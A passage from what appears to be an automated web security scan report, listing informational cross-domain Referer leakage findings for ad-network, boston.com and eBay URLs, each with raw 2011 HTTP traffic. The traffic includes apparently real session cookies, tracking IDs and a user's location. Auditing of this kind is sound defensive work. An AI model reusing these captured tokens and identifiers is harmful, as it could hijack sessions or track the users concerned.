GET /pagead/ads?client=ca-pub-0742401739139530&output=html&h=250&slotname=4384935633&w=250&lmt=1311136947&flash=10.3.181&url=http%3A%2F%2Fmajornelson.com%2F&dt=1311118945863&bpp=6&shv=r20110713&jsv=r20110627&correlator=1311118947498&frm=4&adk=2623290263&ga_vid=777545616.1311118951&ga_sid=1311118951&ga_hid=1083990928&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=1049&bih=723&fu=0&ifi=1&dtd=M&xpc=NDGHfy2VsO&p=http%3A//majornelson.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 19 Jul 2011 23:43:27 GMT
Server: cafe
Cache-Control: private
Content-Length: 3740
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://majornelson.com/%26hl%3Den%26client%3Dca-pub-0742401739139530%26adU%3Daxosoft.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGW31YiDsZ6SSUeUeo_Ooj_hYjYFg" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js"></script>
...[SNIP]...

20.32. http://ib.adnxs.com/ptj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ptj?member=311&inv_code=cm.quadbostonglobe&size=160x600&imp_id=cm-10210473643_1311108278,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonglobe%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10210473643_1311108278%2C11fda490648f83c%2Cnone%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D551186%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1311108273%3F

The response contains the following link to another domain:

http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1

Request

GET /ptj?member=311&inv_code=cm.quadbostonglobe&size=160x600&imp_id=cm-10210473643_1311108278,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonglobe%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10210473643_1311108278%2C11fda490648f83c%2Cnone%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D551186%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1311108273%3F HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII1LEDEAoYAiACKAIwwNmX8QQQwNmX8QQYAQ..; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb575527=5_[r^XI()v4bi][?zqy!w=Td+?enc=HMdxnOM4DkAAAABAMzMLQAAAAEAzMwtAc2iR7Xy_EUC4HoXrUbgTQN1zHazSs38qOHCoZussF2TA7CVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAAnwQBAgUCAQUAAAAADB5xdgAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108288%29%3Buf%28%27r%27%2C+510110%2C+1311108288%29%3Bppv%2815053%2C+%273062363989047342045%27%2C+1311108288%2C+1316292288%2C+98060%2C+76813%29%3B&cnd=!gyE-tQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBzczM9FG4E0DBAc3MzPRRuBNAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA; path=/; expires=Wed, 20-Jul-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`O#eS@?iab*eFC<w6z$DO^Tcc.#XB=6U.'M7Q+4AdiD@gc[5FE]T[7U:0sov)-Jo>9R2c%^J4A/.0(bl'kqZ6?5yZZ; path=/; expires=Mon, 17-Oct-2011 20:44:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:44:48 GMT
Content-Length: 386

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=c
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');

20.33. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/seg?add=153795&t=1

The response contains the following link to another domain:

http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1

Request

GET /seg?add=153795&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz03MyZweGlkPTY5MzE%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; anj=Kfw)lH.MX(*cOV4J(G0rT[sdS9#q[**!]Sj?.D5$b3XGr*4jV0]+t:u?!*j<L9b](e)H1(`+-Fq2=@FTdw<ei:aB%b14$h^)j4vglv!'6LSf?oc`u:Tsn_-oP>Z0IVm#i>Gtk>+b^ORfa1v?L</.9Z_C*.`u'i5B-XO5:/-%5D[zb>+K>cdJ)Jz`w6^)-lIbzJ2lQh@jHMAwvj)mNXp38tjP^7M@WY.PsU[7/NEMjU!1KYet_A>#LXEo*7ron=Wltj1hsNF4@+UZO!!5tJ#woQyuO)T8F.q^W46X!PN^Fj9@?7Z?TQ3RTNfA-3oM3EgVfIju<#.G/)w__2ES.hQq$Z`%Zmi?@Ht??.t?ZaDen%`by>vq$E<^GA$R?)^vJocR$$cOW%N'%(9o`v5<(U[y'rA+AaXg=z`X<MzA(EJfkq2]t@Hr=x9I[0[%OMhfr_NOkt6OuYJBl0.zmW:h^0d8ShDG.y_$:9-bLGi+hv!m4ex5?r`3)V[q.dMebAu%+>)2a#D`+#k?g]^i^v/Q8GvtUO?6-`b`2.EgfM#)qt]VjH#@'s-J6xpiIWnNHhuTC)3@<_l@Y(H_#:zhzR!SGPU_u%mT:UPQ'9/KpGHtlW:7')vE.Uw)(KJEK6L>yg.0iSp11dac+*(=xrlta+)R6R5p>8TLPbf)JGX@1b+Pq5.2qRTykNz<I-8tET[>msgo.<`$WTn>7I4wUu)^12LI<mKA?%[`(V:@gqc>mj+D/GBf1MvBbKTL1oW>TQW5S)H'QhxhWkZ_w1H+dtE7$Mb!n]tNK'; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:26:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:07 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)lByDua)J710aP?'v<j9Bj9#sshCdn9A?J]MHm4djdh*fTokzlP?'IeiRYcrgd/?I%!PYNsa3QG7`':T=b1(C$n8uakA]EJgbo16l0bq[2PwUYeq4_zzD^L4=E-]ex/@l=PcBnc`Xuiu/:KpeW9)=iRv`fmKbVVZI/OoD3?DnN9OnmFhoOc8xvo>u6iwyeV>QD62__f7a#3:5q$q4aPqG1T:<Z?j/ZpS'aMhb'5BC:6G`$^@-]iEOVu=$]oKA#Iyuc=14In[iEbQSTC4@m-L6uZt<T=X')25C91X81x_:c<MSsRP34ukE(=bj*jPL(/0-IV84wB#+X^ss#[9<<$Q@a+VEl':1J7s*d7flUhAS_gG6KD^$>jiO9*?EC%C2qSJG%K77yOdi^ENEfY0GJK:fM2YkZ1BjtL8!51HU^V>TE$RP2z^M*Bu![@!Y:g=m(fw%ZMPpRx]qmOWK!'Lk9>pJs6jCl7vjhK'k7@Yq's#O2+k0bavX8IgZ(2eg8Iq'OgjaBA]27z5G>5#wkPFI*6>>O^xAod^m#Q<+^F@a6I/][hLzw7KZVd#XOb3(!4q%(>Nb8>WjvV)Ag6mq9`QIG?4<kyXV8`iy3b901p8f%<3GuwHa3VLpq'3E_EIX@P:F*z0G[Hj9G`rSz9zBgDE`-zKcoDn_h10b5.G5`lEsMJF[h=Ci0/_5cX7WrBo$-rxj<qpdy5L*C*#sgP9bhaN1pU%vF^VtPFLKx?]OOgMS)eiXRYplz0Y_>:6v0/3z[6Q.#CW>ETTl!6R%P8'YnBe`CJuHucMRU>CHwzceH:]d)'x)zLV?zhrz; path=/; expires=Mon, 17-Oct-2011 20:26:07 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:26:07 GMT
Content-Length: 99

document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');

20.34. http://mobile.ebay.com/wp-content/themes/platformpro/js/ticker_twitter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mobile.ebay.com
Path:	/wp-content/themes/platformpro/js/ticker_twitter.js

Issue detail

The page was loaded from a URL containing a query string:

http://mobile.ebay.com/wp-content/themes/platformpro/js/ticker_twitter.js?ver=3.1

The response contains the following link to another domain:

http://nyti.ms/cUXeuF

Request

GET /wp-content/themes/platformpro/js/ticker_twitter.js?ver=3.1 HTTP/1.1
Host: mobile.ebay.com
Proxy-Connection: keep-alive
Referer: http://mobile.ebay.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ds2=asotr/b13qzzzzzLCz^; ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5E; dp1=bpbf/%2320000000000000000450070271^vrvi/1%7C0%7C120749940240%7C4e32fdf1^tzo/12c4e25dd01^u1p/QEBfX0BAX19AQA**50070271^idm/14e272014^; ns1=BAQAAATErF7ITAAaAANgARlAHAnFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wOVS+7vNiAcwAgxQphZebxkn8+UI*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=BAQAAATErF7ITAAWAAPgAIE4nIHE0M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQASAApOJyBxdGVzdENvb2tpZQFKABhOJyBxNGUyNWNlZjEuMC4xLjExLjgxLjAuMC4yFPNiJeAhFsvLL4xWqs4KDQJVMx8*; nonsession=CgAAIABxOTVvxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9BxYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXV+TIBTAAYUAcCcTRlMjVjZWYxLjAuMS4xMS43OC4zLjAuMpEBtrc*; lucky9=3520182; cid=A2TySNFv

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:18 GMT
Server: Apache
Last-Modified: Fri, 19 Nov 2010 20:39:37 GMT
ETag: "3b861b-16bd-4956de7a27440"
Accept-Ranges: bytes
Content-Length: 5821
Cneonction: close
Content-Type: application/x-javascript

// JavaScript Document
/*Example message arrays for the two demo scrollers*/
var pausecontenttwit=new Array()
//pausecontenttwit[0]='<div>RedLaser iPhone app voted "perfect shopping companion" in <
...[SNIP]...
</a> Top 10 Must Have Apps. <a href="http://nyti.ms/cUXeuF #redlaser #mobile" target="_blank">http://nyti.ms/cUXeuF #redlaser #mobile</a>
...[SNIP]...
</a> Top 10 Must Have Apps. <a href="http://nyti.ms/cUXeuF #redlaser #mobile" target="_blank">http://nyti.ms/cUXeuF #redlaser #mobile</a>
...[SNIP]...
</a> Top 10 Must Have Apps. <a href="http://nyti.ms/cUXeuF #redlaser #mobile" target="_blank">http://nyti.ms/cUXeuF #redlaser #mobile</a>
...[SNIP]...

20.35. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=2ecd6c1e-5306-444b-942d-9108b17fd086&Expiration=1311540183&custom_user_segments=%2C12451%2C14055%2C40236%2C4373%2C57626%2C1150%2C11743

Request

GET /admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; subID="{}"; impressions="{\"580192\": [1308590348+ \"162762637887060014\"+ 29710+ 11561+ 12332]}"; camp_freq_p1="eJzjkuH4vZBVgFGip+nfexYFRo2epc0fWAwYLcB8AJyQC1E="; exchange_uid="eyIyIjogWyI3MjEyMjgyNzE3ODA4MzkwMjAwIiwgNzM0MzIxXSwgIjQiOiBbIkUwIiwgNzM0MzA4XX0="; io_freq_p1="eJzjEua4ECrAKNHT9O89iwGjBZgGAEeuB9s="; segments_p1="eJzjYuFYs4uJi5ljcSKQ+McBJKYqAYnnuVycHPejBY40HfvIwsXCMesQMwDhcQvD"; partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXSwgIjE5OSI6IFsiNUY0MTJDQzZCQTA4RkQ2N0FBNENDNzVBMDA1N0RBMjUiLCB0cnVlXSwgIjE5MSI6IFsiNzM1MjgyMTM0NDMwMDgwMTA4MSIsIHRydWVdLCAiMTUiOiBbIjAwMzAwMTAwMTk4MDAwMDg4NTg1OSIsIHRydWVdfQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:03 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 19-Jul-2011 20:42:43 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 257

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=2ecd6c1e-5306-444b-942d-9108b17fd086&Expiration=1311540183&custom_user_segments=%2C12451%2C14055%2C40236%2C4373%2C57626%2C1150%2C11743"/>');

20.36. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.msn.com/ADSAdClient31.dll?GetSAd=&DPJS=4&ID=E361C23374E642C998D8ABA7166A75EC&MUID=E361C23374E642C998D8ABA7166A75EC&PG=OOLSCA&AP=1089

The response contains the following link to another domain:

http://ads2.msads.net/CIS/119/000/000/000/017/244.jpg

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&ID=E361C23374E642C998D8ABA7166A75EC&MUID=E361C23374E642C998D8ABA7166A75EC&PG=OOLSCA&AP=1089 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; __switchTo5x=94; __unam=7a54b75-130adfe6f89-5d6f1b4f-2; MUID=E361C23374E642C998D8ABA7166A75EC; MSNTVID=e9b0b7965c774fdb94f4dbbf73989380; mh=LENOVO; Sample=93; SRCHHPGUSR=AS=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 857
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8941475-T49420321-C10000000000050600
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Tue, 19 Jul 2011 15:19:23 GMT
Content-Length: 857

//<![CDATA[
function getRADIds() { return{"adid":"10000000000050600","pid":"8941475","targetid":"49420321"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);}

...[SNIP]...
<a href="http://g.msn.com/2AD0004Z/10000000000050600.1??PID=8941475&UIT=G&TargetID=49420321&AN=538001986&PG=OOLSCA&ASID=6f30171621d74edaaa12a46f89c99ac2" target="_blank"><img src="http://ads2.msads.net/CIS/119/000/000/000/017/244.jpg" width="300" height="250" alt="Buy Microsoft Office 2010" border="0" /></a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5

Issue detail

The page was loaded from a URL containing a query string:

http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5?

The response contains the following links to other domains:

http://a.collective-media.net/ad/q1.q.boston/be_home;sz=728x90;ord=84105094?
http://a.collective-media.net/adj/q1.q.boston/be_home;sz=728x90;ord=84105094?
http://a.collective-media.net/jump/q1.q.boston/be_home;sz=728x90;ord=84105094?
http://tags.crwdcntrl.net/c/520/cc.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:41:51 GMT
Server: Apache
Set-Cookie: RMFD=011QjH71; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 21371
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: application/x-javascript
Connection: Keep-Alive

function OAS_RICH(position) {
if (position == 'TOP') {
document.write ('<A HREF="http://rmedia.boston.com/RealMedia/ads/click_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonial
...[SNIP]...
\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.q.boston/be_home;sz=728x90;ord=84105094?" type="text/javascript"></script>
...[SNIP]...
<noscript><a href="http://a.collective-media.net/jump/q1.q.boston/be_home;sz=728x90;ord=84105094?" target="_blank"><img src="http://a.collective-media.net/ad/q1.q.boston/be_home;sz=728x90;ord=84105094?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
stream_lx.ads/www.boston.com/homepage/default/1524696595/MISC3/boston/default/empty.gif/726348573830334b61734941426a4977?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'MISC4') {
document.write ('<script type="text/javascript" src="http://tags.crwdcntrl.net/c/520/cc.js"></script>
...[SNIP]...

20.38. https://signin.ebay.com/ws/eBayISAPI.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.ebay.com
Path:	/ws/eBayISAPI.dll

Issue detail

The page was loaded from a URL containing a query string:

https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&ru=http%3A%2F%2Foffer.ebay.com%2Fws%2FeBayISAPI.dll%3FBinConfirm%26item%3D120749940240%26quantity%3D1%26fb%3D1%26frompage%3D4340%26rev%3D3%26BidBinInfo%3D%253CbidInfo%253E%253CID%253E120749940240%253C%252FID%253E%253CMB%253E%253C%252FMB%253E%253CQTY%253E1%253C%252FQTY%253E%253C%252FbidInfo%253E&pageType=2143&onepagereg=1&item=120749940240&ICurl=https%3A%2F%2Fsecurethumbs.ebay.com%2Fpict%2F1207499402408080.jpg&ICtitle=U2+360+Tour+2+Tickets+sec345+New+Jersey+Wed+July+2011&ICdateMedium=Aug-13-11&ICtimeLong=16%3A29%3A46+PDT&gch=1&gchru=https%3A%2F%2Fpayments.ebay.com%2Fws%2FeBayISAPI.dll%3FGuestCheckoutProcessor%26item%3D120749940240%26quantity%3D1%26transactionid%3D-1%26rev%3D3

The response contains the following links to other domains:

https://secureinclude.ebaystatic.com/v4css/z/ic/5i3fq334pyyxhijc5f3zqvjyc.css
https://secureinclude.ebaystatic.com/v4css/z/il/u2dx44plymz1dfsknxx55os3q.css
https://secureinclude.ebaystatic.com/v4js/z/2m/losgv3zyn2yr5lrg0h4ik5yt4.js
https://secureinclude.ebaystatic.com/v4js/z/e2/1kgeg22jaq0d3efjwymeoqcvm.js
https://secureinclude.ebaystatic.com/v4js/z/eu/341wgvdjgy2abb1qzf3cxflzf.js
https://secureinclude.ebaystatic.com/v4js/z/yo/gjzdlqbe2q0kzkzs2c4o43o5q.js
https://securepics.ebaystatic.com/aw/pics/buy/trust/imgGuarantee_footer.gif
https://securepics.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif
https://securepics.ebaystatic.com/aw/pics/logos/logoNewVeriSign_100x65.gif
https://securepics.ebaystatic.com/aw/pics/s.gif

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
Set-Cookie: ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
